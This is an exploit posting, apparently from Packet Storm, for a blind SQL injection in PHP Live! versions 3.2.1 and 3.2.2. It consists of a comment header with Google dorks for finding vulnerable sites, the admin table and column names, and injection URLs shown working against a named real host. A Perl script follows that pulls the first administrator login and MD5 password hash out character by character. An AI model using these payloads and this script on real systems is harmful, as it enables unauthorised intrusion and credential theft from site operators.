PHP Live! versions 3.2.1 and 3.2.2 remote blind SQL injection exploit.
fb03077e7486a5ac8136c6383ad46c89fc9296cce8a2278237c89e16cae9aa01#!/usr/bin/perl
#################################################################
#################################################################
################ Original discover author banner ################
#################################################################
#################################################################
# PhpLive 3.2.1/2 (x) Blind SQL injection [_][-][X]
# _ ___ _ ___ ___ ___ _____ __ ___ __ __ ___
# | |/ / || |/ __|___ / __| _ \ __\ \ / / |_ ) \ / \/ _ \
# | ' <| __ | (_ |___| (__| / _| \ \/\/ / / / () | () \_, /
# |_|\_\_||_|\___| \___|_|_\___| \_/\_/ /___\__/ \__/ /_/
#
#
# Red n'black i dress eagle on my chest.
# It's good to be an ALBANIAN Keep my head up high for that flag i die.
# Im proud to be an ALBANIAN
# ###################################################################
# Author : boom3rang
# Contact : boom3rang[at]live.com
# Greetz : H!tm@N - KHG - cHs
#
# R.I.P redc00de
# -------------------------------------------------------------------
#
# Affected software description
# Software : PhpLive
# Vendor : http://www.phplivesupport.com
# Price : Live Support Download Starts at $89.95
# Version Vuln. : v3.2.1 & v3.2.2
# -------------------------------------------------------------------
#
# [~] SQLi :
#
# http://www.TARGET.com/message_box.php?theme=&l=[USERNAME]&x=[SQLi]
# http://www.TARGET.com/request.php?l=[USERNAME]&x=[SQLi]
#
#
# [~]Google Dork :
#
# Powered by PHP Live! v3.2.1
# Powered by PHP Live! v3.2.2
# allinurl:"request.php" "deptid"
#
# -------------------------------------------------------------------
#
# [~] Table_NAME = chat_admin
# [~] Column_NAME = login - password - email - userID - name
# -------------------------------------------------------------------
#
# [~] Admin Path :
#
# http://www.TARGET.com/phplive
# -------------------------------------------------------------------
# [~] Live Demo:
#
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=1 --> True
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1 AND 1=2 --> False
#
# -------------------------------------------------------------------
#
# [~] ASCII
#
# /**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>100
#
# -------------------------------------------------------------------
#
# [~] Live Demo ASCII
#
# True
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>48
#
# False
# http://chat.apolloservers.com/phplive/request.php?l=admin&x=1/**/and/**/ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/chat_admin/**/limit/**/1,1),1,1))>127
#
###########################
###########################
# Modified version banner #
###########################
###########################
# Author: skys
# Contact: skysbsb[at]gmail.com
# This script uses the PhpLive Blind Sql Injection (found by boom3rang) to recover first user login and MD5 password!
# The result of this script is like:
# admin:890f37d479270aea39ae0e156bbd9001
####################
# EDIT THESE LINES #
####################
# Edit this address acording to the php live path
$address = "http://www.site.com/phplive";
###############################
# DO NOT EDIT BELOW THIS LINE #
###############################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
@site = ($address."/request.php?l=agenciawiv&x=1/**/and/**/ascii%28substring%28%28select/**/concat%28login,0x3a,password%29/**/from/**/chat_admin/**/limit/**/1,1%29,", ",1%29%29=");
$base64str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
$tudo = "";
$foundcolon = 0;
for($i=1;$i<=100;$i++) {
$found = 0;
if($foundcolon == 0) {
for($x=32;$x<=127;$x++) {
$url = $site[0].$i.$site[1].$x;
print "Testing pass index $i: character ".chr($x)."($x)\n";
$resp = query($url);
if($resp =~ m/deptid/i) {
print "Found i($i): ".chr($x)."($x)\n";
$tudo .= chr($x);
print "All: $tudo\n";
$found = 1;
if($x == 0x3a) {
$foundcolon = 1;
}
last;
}
}
} else {
for($x=0;$x<length($base64str);$x++) {
$url = $site[0].$i.$site[1].ord(substr($base64str, $x, 1));
print "Testing pass index $i: character ".ord(substr($base64str, $x, 1))."(".substr($base64str, $x, 1).")\n";
$resp = query($url);
if($resp =~ m/deptid/i) {
print "Found i($i): ".substr($base64str, $x, 1)."(".ord(substr($base64str, $x, 1)).")\n";
$tudo .= substr($base64str, $x, 1);
print "All: $tudo\n";
$found = 1;
last;
}
}
}
if($found == 0) {
print "Not found char index $i! End of md5 hash? :-)\n";
last;
}
}
print "login:md5: $tudo\n";
exit;
sub query() {
$link = $_[0];
my $req = HTTP::Request->new( GET => $link );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
return $response->content;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed